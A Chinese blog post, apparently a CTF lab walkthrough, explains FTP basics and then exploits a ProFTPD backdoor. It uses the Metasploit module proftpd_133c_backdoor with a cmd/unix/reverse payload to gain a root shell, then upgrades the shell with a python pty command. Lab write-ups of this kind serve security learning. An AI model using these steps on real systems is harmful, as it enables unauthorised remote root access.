CTF靶场之FTP服务后门利用

FTP(File Transfer Protocol,文件传输协议)是TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。
默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数据,21用于传输控制信息。但是,是否使用20作为传输数据的端口与FTP使用的传输模式有关,如果采用主动模式,那么数据传输端口就是20;如果采用被动模式,则具体最终使用哪个端口要服务器端和客户端协商决定。

老规矩,扫描靶场IP,具体见之前的SSH秘钥泄露
在这里插入图片描述
nmap扫一下,发现开放了ftp服务,结合靶场的名字——FTP服务后门,复制版本号查一下有没有利用模块
在这里插入图片描述
第二个是msf的模块,因为长度问题没有完全显示。。。
在这里插入图片描述
打开msf,再查一下具体的利用模块,就是第四个
在这里插入图片描述
把那个模块的名字复制下来,然后看一下设置

use exploit/unix/ftp/proftpd_133c_backdoor

在这里插入图片描述
需要先设置payload,所以看一下具体有哪些,这里选择第三个
在这里插入图片描述

set payload cmd/unix/reverse

然后设置目标IP和攻击机IP
在这里插入图片描述
设置成功后开始攻击,直接就是root权限
在这里插入图片描述
在终端输入python -c "import pty;pty.spawn('/bin/bash')"进行美化即可
在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值